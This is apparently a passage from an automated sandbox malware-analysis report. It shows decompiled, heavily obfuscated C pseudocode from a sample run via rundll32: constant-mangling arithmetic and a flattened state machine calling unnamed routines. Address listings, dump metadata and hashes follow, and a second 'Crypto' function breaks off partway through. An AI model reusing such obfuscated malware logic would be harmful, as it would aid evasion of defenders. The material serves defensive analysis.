				_v2912 = _v2912 >> 8;
				_v2912 = _v2912 + 0xbc5;
				_v2912 = _v2912 ^ 0x000f01bd;
				_v2888 = 0xb7f9c;
				_v2888 = _v2888 ^ 0x23a090a0;
				_v2888 = _v2888 + 0xffffcb65;
				_v2888 = _v2888 + 0xffffb53f;
				_v2888 = _v2888 ^ 0x23a896a2;
				_v2776 = 0xcbb323;
				_v2776 = _v2776 + 0x81c3;
				_v2776 = _v2776 >> 1;
				_v2776 = _v2776 ^ 0x00676393;
				_v2648 = 0x271f91;
				_v2648 = _v2648 + 0xffff9397;
				_v2648 = _v2648 ^ 0x0029f035;
				_v2896 = 0x78618c;
				_v2896 = _v2896 << 0xc;
				_v2896 = _v2896 ^ 0x0a821cde;
				_v2896 = _v2896 + 0xb475;
				_v2896 = _v2896 ^ 0x8c94da80;
				_v2720 = 0xacdc2a;
				_v2720 = _v2720 | 0x57611697;
				_v2720 = _v2720 ^ 0xc01b1ef4;
				_v2720 = _v2720 ^ 0x97fc8dfe;
				_v2668 = 0x55603e;
				_v2668 = _v2668 >> 1;
				_v2668 = _v2668 ^ 0x002dad1d;
				_v2828 = 0xf126f6;
				_t742 = 0x29;
				_v2828 = _v2828 * 0x43;
				_v2828 = _v2828 + 0x8cbb;
				_v2828 = _v2828 ^ 0x3f126f56;
				_v2768 = 0x9c087b;
				_v2768 = _v2768 << 9;
				_v2768 = _v2768 + 0xffffe171;
				_v2768 = _v2768 ^ 0x3813f585;
				_v2880 = 0xb815a3;
				_v2880 = _v2880 ^ 0x72879ea7;
				_v2880 = _v2880 / _t742;
				_v2880 = _v2880 + 0xc3b;
				_v2880 = _v2880 ^ 0x02c00b8a;
				_v2872 = 0xffe9a8;
				_v2872 = _v2872 | 0x05f4b9e7;
				_v2872 = _v2872 + 0xffff2424;
				_v2872 = _v2872 << 7;
				_v2872 = _v2872 ^ 0xff8a2c7e;
				_v2808 = 0x17a98a;
				_t743 = 0x6a;
				_v2808 = _v2808 * 0x35;
				_v2808 = _v2808 + 0x8a0b;
				_v2808 = _v2808 ^ 0x04e27d5d;
				_v2644 = 0x3aca8c;
				_v2644 = _v2644 | 0x1dba2023;
				_v2644 = _v2644 ^ 0x1dba33fd;
				_v2760 = 0xa9a4ba;
				_v2760 = _v2760 ^ 0x6721c4f3;
				_v2760 = _v2760 + 0xffff7b43;
				_v2760 = _v2760 ^ 0x6786e634;
				_v2660 = 0xef5940;
				_t327 =  &_v2660; // 0xef5940
				_v2660 =  *_t327 / _t743;
				_v2660 = _v2660 ^ 0x0008b7a5;
				_v2640 = 0x8c91f9;
				_v2640 = _v2640 + 0x2aa0;
				_v2640 = _v2640 ^ 0x008fd6f1;
				_v2716 = 0xebae10;
				_v2716 = _v2716 + 0x2e93;
				_v2716 = _v2716 >> 3;
				_v2716 = _v2716 ^ 0x0012b27f;
				_v2692 = 0xf4ef17;
				_v2692 = _v2692 ^ 0x14a8ca79;
				_v2692 = _v2692 ^ 0x145940a6;
				_v2712 = 0x90da21;
				_v2712 = _v2712 * 0x5c;
				_v2712 = _v2712 << 6;
				_v2712 = _v2712 ^ 0x039c340b;
				_v2812 = 0x599c06;
				_v2812 = _v2812 | 0x7b64813d;
				_v2812 = _v2812 * 0x3e;
				_v2812 = _v2812 ^ 0xe8633365;
				_v2748 = 0x57b46;
				_t744 = 0x38;
				_v2748 = _v2748 / _t744;
				_v2748 = _v2748 + 0xffffe4a2;
				_v2748 = _v2748 ^ 0xffff7983;
				_v2856 = 0xb347e1;
				_v2856 = _v2856 << 0xf;
				_v2856 = _v2856 + 0xc3e6;
				_v2856 = _v2856 ^ 0xcd6ff0ef;
				_v2856 = _v2856 ^ 0x6e991901;
				_v2756 = 0x3d21e7;
				_v2756 = _v2756 + 0x4052;
				_v2756 = _v2756 + 0xfab6;
				_v2756 = _v2756 ^ 0x0033d413;
				_v2680 = 0xeea097;
				_v2680 = _v2680 * 0x29;
				_v2680 = _v2680 ^ 0x26367c85;
				_v2852 = 0x9a84c7;
				_v2852 = _v2852 << 4;
				_v2852 = _v2852 + 0x5305;
				_v2852 = _v2852 * 0x47;
				_v2852 = _v2852 ^ 0xadc8f5b7;
				_v2736 = 0x1d92c0;
				_v2736 = _v2736 ^ 0x4e3febcd;
				_v2736 = _v2736 ^ 0x2a5eeaad;
				_v2736 = _v2736 ^ 0x647637b5;
				_v2916 = 0x7a6f6e;
				_v2916 = _v2916 << 3;
				_v2916 = _v2916 | 0x74549758;
				_v2916 = _v2916 * 0x5e;
				_v2916 = _v2916 ^ 0x014df6ca;
				_v2820 = 0x88f64;
				_v2820 = _v2820 << 0xb;
				_v2820 = _v2820 ^ 0x8d7f89a1;
				_v2820 = _v2820 ^ 0xc90720e1;
				_v2672 = 0x9d7b6a;
				_v2672 = _v2672 * 0x74;
				_v2672 = _v2672 ^ 0x47521deb;
				_v2868 = 0x2a980b;
				_v2868 = _v2868 << 2;
				_v2868 = _v2868 * 0x37;
				_v2868 = _v2868 * 0x45;
				_v2868 = _v2868 ^ 0xdda58f8d;
				_v2704 = 0xd94882;
				_v2704 = _v2704 >> 7;
				_v2704 = _v2704 ^ 0x000dd1c5;
				_v2908 = 0x8685cf;
				_v2908 = _v2908 >> 6;
				_v2908 = _v2908 + 0x478f;
				_v2908 = _v2908 | 0x9a4acbdf;
				_v2908 = _v2908 ^ 0x9a416c75;
				_v2724 = 0x3983d7;
				_v2724 = _v2724 ^ 0xaf8ece10;
				_v2724 = _v2724 + 0xfffffe8c;
				_v2724 = _v2724 ^ 0xafb9f002;
				_v2652 = 0xb48fd9;
				_v2652 = _v2652 >> 7;
				_v2652 = _v2652 ^ 0x0003170e;
				_v2732 = 0x26e706;
				_v2732 = _v2732 + 0xffff7cb3;
				_v2732 = _v2732 << 7;
				_v2732 = _v2732 ^ 0x13307998;
				_v2840 = 0xdaf489;
				_v2840 = _v2840 ^ 0x20b9ad9c;
				_v2840 = _v2840 + 0xa5fa;
				_v2840 = _v2840 ^ 0x206e4944;
				_v2848 = 0x15799;
				_v2848 = _v2848 + 0xffffbd76;
				_v2848 = _v2848 | 0x84cc3dff;
				_v2848 = _v2848 ^ 0x84c4ee28;
				_v2740 = 0x344f78;
				_v2740 = _v2740 | 0xed30b44e;
				_v2740 = _v2740 + 0x582d;
				_v2740 = _v2740 ^ 0xed3a4892;
				_v2764 = 0x3aec11;
				_t745 = 0x14;
				_v2764 = _v2764 * 0x24;
				_v2764 = _v2764 * 0xd;
				_v2764 = _v2764 ^ 0x6bb19aaa;
				_v2772 = 0xa2a4e3;
				_v2772 = _v2772 * 0x54;
				_v2772 = _v2772 + 0xd74c;
				_v2772 = _v2772 ^ 0x35517ae7;
				_v2780 = 0xc7cad3;
				_v2780 = _v2780 ^ 0xe16f0727;
				_v2780 = _v2780 + 0xa55f;
				_v2780 = _v2780 ^ 0xe1ad612a;
				_v2788 = 0x30bac2;
				_v2788 = _v2788 << 2;
				_v2788 = _v2788 * 0x19;
				_v2788 = _v2788 ^ 0x130f6af8;
				_v2708 = 0x5b81b7;
				_v2708 = _v2708 << 0xd;
				_v2708 = _v2708 ^ 0x7032fecb;
				_v2816 = 0xe0b39a;
				_v2816 = _v2816 + 0xf3c;
				_v2816 = _v2816 * 0x29;
				_v2816 = _v2816 ^ 0x23fa5b32;
				_v2832 = 0xb37143;
				_v2832 = _v2832 + 0xffff99de;
				_v2832 = _v2832 / _t745;
				_v2832 = _v2832 | 0xcb90c15e;
				_v2832 = _v2832 ^ 0xcb9cb56b;
				_v2824 = 0xf7e429;
				_v2824 = _v2824 << 0x10;
				_v2824 = _v2824 ^ 0x4b169193;
				_v2824 = _v2824 ^ 0xaf30b470;
				_t703 = E007A7CDB(_t745);
				_t797 = _v2708;
				_t736 = _t703;
				while(1) {
					L1:
					do {
						while(1) {
							L2:
							_t811 = _t798 - 0xa06a9d5;
							if(_t811 <= 0) {
								break;
							}
							__eflags = _t798 - 0xae01df1;
							if(__eflags == 0) {
								_push(_v2740);
								_push(0);
								_push(_t745);
								_push(1);
								_push(0);
								_push(_v2848);
								_t745 = _v2732;
								_push( &_v524);
								E0079AB87(_t745, _v2840, __eflags);
								_t804 = _t804 + 0x1c;
								_t798 = 0xfe27958;
								_t707 = 0x8a3cf08;
								goto L24;
							} else {
								__eflags = _t798 - 0xb104717;
								if(_t798 == 0xb104717) {
									_t745 = _v2748;
									_t708 = E00794816(_t745, _v2632, _v2856, _v2636, _v2756, _v2680);
									_t797 = _t708;
									_t804 = _t804 + 0x10;
									__eflags = _t708;
									_t707 = 0x8a3cf08;
									_t798 =  !=  ? 0x8a3cf08 : 0xa06a9d5;
									continue;
								} else {
									__eflags = _t798 - 0xe3ea8aa;
									if(_t798 == 0xe3ea8aa) {
										return E007A1E67(_v2708, _v2816, _v2832, _v2824, _v2628);
									}
									__eflags = _t798 - 0xfe27958;
									if(_t798 != 0xfe27958) {
										goto L24;
									} else {
										E007A8519(_v2764, _v2772, _t797);
										_pop(_t745);
										_t798 = 0xa06a9d5;
										while(1) {
											L1:
											goto L2;
										}
									}
								}
							}
							L27:
							return _t717;
						}
						if(_t811 == 0) {
							E007A8519(_v2780, _v2788, _v2636);
							_pop(_t745);
							_t798 = 0xe3ea8aa;
							while(1) {
								L1:
								goto L2;
							}
						}
						if(_t798 == 0xce4571) {
							_push(_v2700);
							_push(_v2696);
							_push(_v2688);
							_t745 = _v2796;
							_push( &_v1044);
							E007A46BB(_t745, _v2864);
							_t804 = _t804 - 0xc + 0x1c;
							_t798 = 0x2f0d176;
							while(1) {
								L1:
								goto L2;
							}
						}
						if(_t798 == 0x277711d) {
							_v2624 = E007959E9();
							_v2620 = 2 + E0079CB52(_v2668, _t714, _v2828, _v2768, _v2880) * 2;
							_t745 =  &_v2628;
							_t717 = E007A8727(_t745, _v2804, _v2668, _v2872, _v2808, _v2668, _v2644, _t736, _t736, _v2760, _t736, _v2660, _v2640);
							_t804 = _t804 + 0x38;
							__eflags = _t717;
							if(__eflags != 0) {
								_t798 = 0x47e8611;
								goto L1;
							}
						} else {
							if(_t798 == 0x2f0d176) {
								E007ADA22(_v2684, _v2836, __eflags, _v2664,  &_v2084, _t745, _v2900);
								 *((short*)(E0079B6CF( &_v2084, _v2752, _v2656, _v2800))) = 0;
								E00798969(_v2892,  &_v1564, __eflags, _v2728, _v2792);
								_push(_v2860);
								_push(_v2784);
								E007947CE( &_v2084, _v2920, _v2884, _v2676, _v2928, E007ADCF7(_v2884, 0x791308, __eflags),  &_v1564, _v2844, _v2744);
								E0079A8B0(_v2904, _t722, _v2912);
								_t745 = _v2888;
								_t717 = E0079EA99(_t745, _t803, _v2776, _v2648,  &_v2604, _v2896);
								_t804 = _t804 + 0x5c;
								__eflags = _t717;
								if(__eflags != 0) {
									_t798 = 0x277711d;
									while(1) {
										L1:
										goto L2;
									}
								}
							} else {
								if(_t798 == 0x47e8611) {
									_t745 =  &_v2636;
									E007ADEDC(_t745, _v2716, _v2692, _v2712,  &_v2628, _v2812);
									_t804 = _t804 + 0x10;
									asm("sbb esi, esi");
									_t798 = (_t798 & 0xfcd19e6d) + 0xe3ea8aa;
									while(1) {
										L1:
										goto L2;
									}
								} else {
									_t816 = _t798 - _t707;
									if(_t798 != _t707) {
										goto L24;
									} else {
										_push(_v2916);
										_push(_v2736);
										_t730 = E007ADCF7(_v2852, 0x7913f8, _t816);
										_pop(_t758);
										E007A453F(_v2820, _t816, _v2672, _t730, _v2868,  &_v1044, _t758, _v2704, _v2908, _t797,  &_v2604);
										_t804 = _t804 + 0x24;
										E0079A8B0(_v2724, _t730, _v2652);
										_pop(_t745);
										_t798 = 0xae01df1;
										while(1) {
											L1:
											goto L2;
										}
									}
								}
							}
						}
						goto L27;
						L24:
						__eflags = _t798 - 0xe39a6fa;
					} while (__eflags != 0);
					return _t707;
				}
			}












































































































                                                                                                                          0x007a4b8d
                                                                                                                          0x007a4b97
                                                                                                                          0x007a4ba2
                                                                                                                          0x007a4bad
                                                                                                                          0x007a4bb8
                                                                                                                          0x007a4bc3
                                                                                                                          0x007a4bce
                                                                                                                          0x007a4bd9
                                                                                                                          0x007a4be1
                                                                                                                          0x007a4bec
                                                                                                                          0x007a4bf7
                                                                                                                          0x007a4bff
                                                                                                                          0x007a4c04
                                                                                                                          0x007a4c09
                                                                                                                          0x007a4c11
                                                                                                                          0x007a4c19
                                                                                                                          0x007a4c21
                                                                                                                          0x007a4c33
                                                                                                                          0x007a4c35
                                                                                                                          0x007a4c3a
                                                                                                                          0x007a4c3f
                                                                                                                          0x007a4c45
                                                                                                                          0x007a4c4d
                                                                                                                          0x007a4c55
                                                                                                                          0x007a4c60
                                                                                                                          0x007a4c68
                                                                                                                          0x007a4c73
                                                                                                                          0x007a4c7e
                                                                                                                          0x007a4c8b
                                                                                                                          0x007a4c8c
                                                                                                                          0x007a4c96
                                                                                                                          0x007a4c9a
                                                                                                                          0x007a4c9f
                                                                                                                          0x007a4ca7
                                                                                                                          0x007a4cb2
                                                                                                                          0x007a4cba
                                                                                                                          0x007a4cc5
                                                                                                                          0x007a4cd0
                                                                                                                          0x007a4cdb
                                                                                                                          0x007a4ce6
                                                                                                                          0x007a4cf1
                                                                                                                          0x007a4cfc
                                                                                                                          0x007a4d07
                                                                                                                          0x007a4d0f
                                                                                                                          0x007a4d17
                                                                                                                          0x007a4d1f
                                                                                                                          0x007a4d24
                                                                                                                          0x007a4d2c
                                                                                                                          0x007a4d37
                                                                                                                          0x007a4d42
                                                                                                                          0x007a4d4d
                                                                                                                          0x007a4d5a
                                                                                                                          0x007a4d5e
                                                                                                                          0x007a4d6b
                                                                                                                          0x007a4d6f
                                                                                                                          0x007a4d77
                                                                                                                          0x007a4d8a
                                                                                                                          0x007a4d91
                                                                                                                          0x007a4d99
                                                                                                                          0x007a4da4
                                                                                                                          0x007a4daf
                                                                                                                          0x007a4dba
                                                                                                                          0x007a4dc5
                                                                                                                          0x007a4dd0
                                                                                                                          0x007a4ddb
                                                                                                                          0x007a4de3
                                                                                                                          0x007a4df0
                                                                                                                          0x007a4df8
                                                                                                                          0x007a4e07
                                                                                                                          0x007a4e0a
                                                                                                                          0x007a4e0e
                                                                                                                          0x007a4e16
                                                                                                                          0x007a4e1e
                                                                                                                          0x007a4e29
                                                                                                                          0x007a4e34
                                                                                                                          0x007a4e3f
                                                                                                                          0x007a4e4a
                                                                                                                          0x007a4e55
                                                                                                                          0x007a4e60
                                                                                                                          0x007a4e6b
                                                                                                                          0x007a4e76
                                                                                                                          0x007a4e7e
                                                                                                                          0x007a4e83
                                                                                                                          0x007a4e8b
                                                                                                                          0x007a4e93
                                                                                                                          0x007a4e9b
                                                                                                                          0x007a4ea6
                                                                                                                          0x007a4eb1
                                                                                                                          0x007a4eb9
                                                                                                                          0x007a4ec4
                                                                                                                          0x007a4ecc
                                                                                                                          0x007a4ed4
                                                                                                                          0x007a4ee1
                                                                                                                          0x007a4ee5
                                                                                                                          0x007a4eed
                                                                                                                          0x007a4ef5
                                                                                                                          0x007a4efa
                                                                                                                          0x007a4eff
                                                                                                                          0x007a4f07
                                                                                                                          0x007a4f0f
                                                                                                                          0x007a4f1a
                                                                                                                          0x007a4f25
                                                                                                                          0x007a4f30
                                                                                                                          0x007a4f38
                                                                                                                          0x007a4f41
                                                                                                                          0x007a4f45
                                                                                                                          0x007a4f4a
                                                                                                                          0x007a4f52
                                                                                                                          0x007a4f5f
                                                                                                                          0x007a4f63
                                                                                                                          0x007a4f70
                                                                                                                          0x007a4f74
                                                                                                                          0x007a4f7c
                                                                                                                          0x007a4f87
                                                                                                                          0x007a4f8e
                                                                                                                          0x007a4f99
                                                                                                                          0x007a4fa4
                                                                                                                          0x007a4fb4
                                                                                                                          0x007a4fbc
                                                                                                                          0x007a4fbf
                                                                                                                          0x007a4fc3
                                                                                                                          0x007a4fc8
                                                                                                                          0x007a4fd0
                                                                                                                          0x007a4fd8
                                                                                                                          0x007a4fdd
                                                                                                                          0x007a4fe2
                                                                                                                          0x007a4fea
                                                                                                                          0x007a4ff2
                                                                                                                          0x007a4ffa
                                                                                                                          0x007a5002
                                                                                                                          0x007a500a
                                                                                                                          0x007a5012
                                                                                                                          0x007a501a
                                                                                                                          0x007a5025
                                                                                                                          0x007a5032
                                                                                                                          0x007a5039
                                                                                                                          0x007a5044
                                                                                                                          0x007a504f
                                                                                                                          0x007a505a
                                                                                                                          0x007a5065
                                                                                                                          0x007a506d
                                                                                                                          0x007a5072
                                                                                                                          0x007a507a
                                                                                                                          0x007a5082
                                                                                                                          0x007a508a
                                                                                                                          0x007a5095
                                                                                                                          0x007a50a0
                                                                                                                          0x007a50ab
                                                                                                                          0x007a50b6
                                                                                                                          0x007a50c1
                                                                                                                          0x007a50c8
                                                                                                                          0x007a50d3
                                                                                                                          0x007a50e2
                                                                                                                          0x007a50e5
                                                                                                                          0x007a50e9
                                                                                                                          0x007a50f1
                                                                                                                          0x007a50f9
                                                                                                                          0x007a5104
                                                                                                                          0x007a510c
                                                                                                                          0x007a5117
                                                                                                                          0x007a5122
                                                                                                                          0x007a512a
                                                                                                                          0x007a513a
                                                                                                                          0x007a513e
                                                                                                                          0x007a5146
                                                                                                                          0x007a514e
                                                                                                                          0x007a5156
                                                                                                                          0x007a515e
                                                                                                                          0x007a5166
                                                                                                                          0x007a516b
                                                                                                                          0x007a5173
                                                                                                                          0x007a5186
                                                                                                                          0x007a5187
                                                                                                                          0x007a518e
                                                                                                                          0x007a5199
                                                                                                                          0x007a51a4
                                                                                                                          0x007a51af
                                                                                                                          0x007a51ba
                                                                                                                          0x007a51c5
                                                                                                                          0x007a51d0
                                                                                                                          0x007a51db
                                                                                                                          0x007a51e6
                                                                                                                          0x007a51f1
                                                                                                                          0x007a51fc
                                                                                                                          0x007a5205
                                                                                                                          0x007a520c
                                                                                                                          0x007a5217
                                                                                                                          0x007a5222
                                                                                                                          0x007a522d
                                                                                                                          0x007a5238
                                                                                                                          0x007a5243
                                                                                                                          0x007a524e
                                                                                                                          0x007a5256
                                                                                                                          0x007a5261
                                                                                                                          0x007a526c
                                                                                                                          0x007a5277
                                                                                                                          0x007a5282
                                                                                                                          0x007a5295
                                                                                                                          0x007a529c
                                                                                                                          0x007a52a4
                                                                                                                          0x007a52af
                                                                                                                          0x007a52ba
                                                                                                                          0x007a52cd
                                                                                                                          0x007a52d4
                                                                                                                          0x007a52e1
                                                                                                                          0x007a52f5
                                                                                                                          0x007a52f8
                                                                                                                          0x007a52ff
                                                                                                                          0x007a530a
                                                                                                                          0x007a5315
                                                                                                                          0x007a531d
                                                                                                                          0x007a5322
                                                                                                                          0x007a532a
                                                                                                                          0x007a5332
                                                                                                                          0x007a533a
                                                                                                                          0x007a5345
                                                                                                                          0x007a5350
                                                                                                                          0x007a535b
                                                                                                                          0x007a5366
                                                                                                                          0x007a5379
                                                                                                                          0x007a5380
                                                                                                                          0x007a538b
                                                                                                                          0x007a5393
                                                                                                                          0x007a5398
                                                                                                                          0x007a53a5
                                                                                                                          0x007a53a9
                                                                                                                          0x007a53b1
                                                                                                                          0x007a53bc
                                                                                                                          0x007a53c7
                                                                                                                          0x007a53d2
                                                                                                                          0x007a53dd
                                                                                                                          0x007a53e5
                                                                                                                          0x007a53ea
                                                                                                                          0x007a53f7
                                                                                                                          0x007a53fb
                                                                                                                          0x007a5403
                                                                                                                          0x007a540e
                                                                                                                          0x007a5416
                                                                                                                          0x007a5421
                                                                                                                          0x007a542c
                                                                                                                          0x007a543f
                                                                                                                          0x007a5446
                                                                                                                          0x007a5451
                                                                                                                          0x007a5459
                                                                                                                          0x007a5463
                                                                                                                          0x007a546c
                                                                                                                          0x007a5470
                                                                                                                          0x007a5478
                                                                                                                          0x007a5483
                                                                                                                          0x007a548b
                                                                                                                          0x007a5496
                                                                                                                          0x007a549e
                                                                                                                          0x007a54a3
                                                                                                                          0x007a54ab
                                                                                                                          0x007a54b3
                                                                                                                          0x007a54bb
                                                                                                                          0x007a54c6
                                                                                                                          0x007a54d1
                                                                                                                          0x007a54dc
                                                                                                                          0x007a54e7
                                                                                                                          0x007a54f2
                                                                                                                          0x007a54fa
                                                                                                                          0x007a5505
                                                                                                                          0x007a5510
                                                                                                                          0x007a551b
                                                                                                                          0x007a5523
                                                                                                                          0x007a552e
                                                                                                                          0x007a553e
                                                                                                                          0x007a5546
                                                                                                                          0x007a554e
                                                                                                                          0x007a5556
                                                                                                                          0x007a5568
                                                                                                                          0x007a5570
                                                                                                                          0x007a5578
                                                                                                                          0x007a5580
                                                                                                                          0x007a558b
                                                                                                                          0x007a5596
                                                                                                                          0x007a55a1
                                                                                                                          0x007a55ac
                                                                                                                          0x007a55c1
                                                                                                                          0x007a55c2
                                                                                                                          0x007a55d1
                                                                                                                          0x007a55d8
                                                                                                                          0x007a55e3
                                                                                                                          0x007a55f6
                                                                                                                          0x007a55fd
                                                                                                                          0x007a5608
                                                                                                                          0x007a5613
                                                                                                                          0x007a561e
                                                                                                                          0x007a5629
                                                                                                                          0x007a5634
                                                                                                                          0x007a563f
                                                                                                                          0x007a564a
                                                                                                                          0x007a565a
                                                                                                                          0x007a5661
                                                                                                                          0x007a566c
                                                                                                                          0x007a5677
                                                                                                                          0x007a567f
                                                                                                                          0x007a568a
                                                                                                                          0x007a5695
                                                                                                                          0x007a56a8
                                                                                                                          0x007a56af
                                                                                                                          0x007a56ba
                                                                                                                          0x007a56c2
                                                                                                                          0x007a56d0
                                                                                                                          0x007a56d4
                                                                                                                          0x007a56dc
                                                                                                                          0x007a56e4
                                                                                                                          0x007a56ec
                                                                                                                          0x007a56f1
                                                                                                                          0x007a56f9
                                                                                                                          0x007a5709
                                                                                                                          0x007a570e
                                                                                                                          0x007a5715
                                                                                                                          0x007a5717
                                                                                                                          0x007a5717
                                                                                                                          0x007a571c
                                                                                                                          0x007a571c
                                                                                                                          0x007a571c
                                                                                                                          0x007a571c
                                                                                                                          0x007a5722
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x007a5a30
                                                                                                                          0x007a5a36
                                                                                                                          0x007a5ac0
                                                                                                                          0x007a5ace
                                                                                                                          0x007a5ad0
                                                                                                                          0x007a5ad1
                                                                                                                          0x007a5ad3
                                                                                                                          0x007a5ad5
                                                                                                                          0x007a5ae0
                                                                                                                          0x007a5ae7
                                                                                                                          0x007a5ae8
                                                                                                                          0x007a5aed
                                                                                                                          0x007a5af0
                                                                                                                          0x007a5af5
                                                                                                                          0x00000000
                                                                                                                          0x007a5a3c
                                                                                                                          0x007a5a3c
                                                                                                                          0x007a5a42
                                                                                                                          0x007a5a9b
                                                                                                                          0x007a5aa2
                                                                                                                          0x007a5aa7
                                                                                                                          0x007a5aa9
                                                                                                                          0x007a5aac
                                                                                                                          0x007a5ab3
                                                                                                                          0x007a5ab8
                                                                                                                          0x00000000
                                                                                                                          0x007a5a44
                                                                                                                          0x007a5a44
                                                                                                                          0x007a5a4a
                                                                                                                          0x00000000
                                                                                                                          0x007a5b2d
                                                                                                                          0x007a5a50
                                                                                                                          0x007a5a56
                                                                                                                          0x00000000
                                                                                                                          0x007a5a5c
                                                                                                                          0x007a5a6b
                                                                                                                          0x007a5a70
                                                                                                                          0x007a5a71
                                                                                                                          0x007a5717
                                                                                                                          0x007a5717
                                                                                                                          0x00000000
                                                                                                                          0x007a5717
                                                                                                                          0x007a5717
                                                                                                                          0x007a5a56
                                                                                                                          0x007a5a42
                                                                                                                          0x007a5b3a
                                                                                                                          0x007a5b3a
                                                                                                                          0x007a5b3a
                                                                                                                          0x007a5728
                                                                                                                          0x007a5a20
                                                                                                                          0x007a5a25
                                                                                                                          0x007a5a26
                                                                                                                          0x007a5717
                                                                                                                          0x007a5717
                                                                                                                          0x00000000
                                                                                                                          0x007a5717
                                                                                                                          0x007a5717
                                                                                                                          0x007a5734
                                                                                                                          0x007a59ce
                                                                                                                          0x007a59dc
                                                                                                                          0x007a59e3
                                                                                                                          0x007a59ee
                                                                                                                          0x007a59f8
                                                                                                                          0x007a59f9
                                                                                                                          0x007a59fe
                                                                                                                          0x007a5a01
                                                                                                                          0x007a5717
                                                                                                                          0x007a5717
                                                                                                                          0x00000000
                                                                                                                          0x007a5717
                                                                                                                          0x007a5717
                                                                                                                          0x007a5740
                                                                                                                          0x007a5948
                                                                                                                          0x007a597a
                                                                                                                          0x007a59ad
                                                                                                                          0x007a59b4
                                                                                                                          0x007a59b9
                                                                                                                          0x007a59bc
                                                                                                                          0x007a59be
                                                                                                                          0x007a59c4
                                                                                                                          0x00000000
                                                                                                                          0x007a59c4
                                                                                                                          0x007a5746
                                                                                                                          0x007a574c
                                                                                                                          0x007a584c
                                                                                                                          0x007a5889
                                                                                                                          0x007a5890
                                                                                                                          0x007a5895
                                                                                                                          0x007a589e
                                                                                                                          0x007a58e5
                                                                                                                          0x007a58f4
                                                                                                                          0x007a5918
                                                                                                                          0x007a591c
                                                                                                                          0x007a5921
                                                                                                                          0x007a5924
                                                                                                                          0x007a5926
                                                                                                                          0x007a592c
                                                                                                                          0x007a5717
                                                                                                                          0x007a5717
                                                                                                                          0x00000000
                                                                                                                          0x007a5717
                                                                                                                          0x007a5717
                                                                                                                          0x007a5752
                                                                                                                          0x007a5758
                                                                                                                          0x007a57f8
                                                                                                                          0x007a580d
                                                                                                                          0x007a5812
                                                                                                                          0x007a5817
                                                                                                                          0x007a581f
                                                                                                                          0x007a5717
                                                                                                                          0x007a5717
                                                                                                                          0x00000000
                                                                                                                          0x007a5717
                                                                                                                          0x007a575e
                                                                                                                          0x007a575e
                                                                                                                          0x007a5760
                                                                                                                          0x00000000
                                                                                                                          0x007a5766
                                                                                                                          0x007a5766
                                                                                                                          0x007a576f
                                                                                                                          0x007a577a
                                                                                                                          0x007a5780
                                                                                                                          0x007a57ba
                                                                                                                          0x007a57bf
                                                                                                                          0x007a57d2
                                                                                                                          0x007a57d7
                                                                                                                          0x007a57d8
                                                                                                                          0x007a5717
                                                                                                                          0x007a5717
                                                                                                                          0x00000000
                                                                                                                          0x007a5717
                                                                                                                          0x007a5717
                                                                                                                          0x007a5760
                                                                                                                          0x007a5758
                                                                                                                          0x007a574c
                                                                                                                          0x00000000
                                                                                                                          0x007a5afa
                                                                                                                          0x007a5afa
                                                                                                                          0x007a5afa
                                                                                                                          0x00000000
                                                                                                                          0x007a571c

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FolderPath
                                                                                                                          • String ID: -X$8ZD$8ZD$:%$>`U$@Y$DIn $G4%>$R@$[z}~$_p$e3c$xO4$~wP`$!=$'$zQ5
                                                                                                                          • API String ID: 1514166925-1547002888
                                                                                                                          • Opcode ID: 7a72d04812dd119e2bac831374250006d63a769c9f6c872fda342a2b36d08694
                                                                                                                          • Instruction ID: abf3ceac82ed35a8adf11241fc901800878f6a60856f282fb3f995439422294b
                                                                                                                          • Opcode Fuzzy Hash: 7a72d04812dd119e2bac831374250006d63a769c9f6c872fda342a2b36d08694
                                                                                                                          • Instruction Fuzzy Hash: BF72FE714093819BD3B8CF25C58AB8BBBE1BBC5318F108A1DE1DA96260D7B48949CF43
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 007A2550 Relevance: 21.1, Strings: 16, Instructions: 1077COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 98%
                                                                                                                          			E007A2550() {
				signed int _v28;
				char _v36;
				char _v84;
				signed int _v100;
				signed int _v104;
				signed int _v112;
				signed int _v124;
				signed int _v140;
				intOrPtr _v144;
				char _v152;
				signed int _v172;
				char _v180;
				char _v188;
				char _v192;
				char _v196;
				char _v200;
				char _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				unsigned int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				unsigned int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				signed int _v444;
				signed int _v448;
				signed int _v452;
				signed int _v456;
				signed int _v460;
				signed int _v464;
				signed int _v468;
				signed int _v472;
				signed int _v476;
				signed int _v480;
				unsigned int _v484;
				unsigned int _v488;
				signed int _v492;
				signed int _v496;
				signed int _v500;
				signed int _v504;
				signed int _v508;
				unsigned int _v512;
				signed int _v516;
				signed int _v520;
				signed int _v524;
				signed int _v528;
				unsigned int _v532;
				signed int _v536;
				signed int _v540;
				unsigned int _v544;
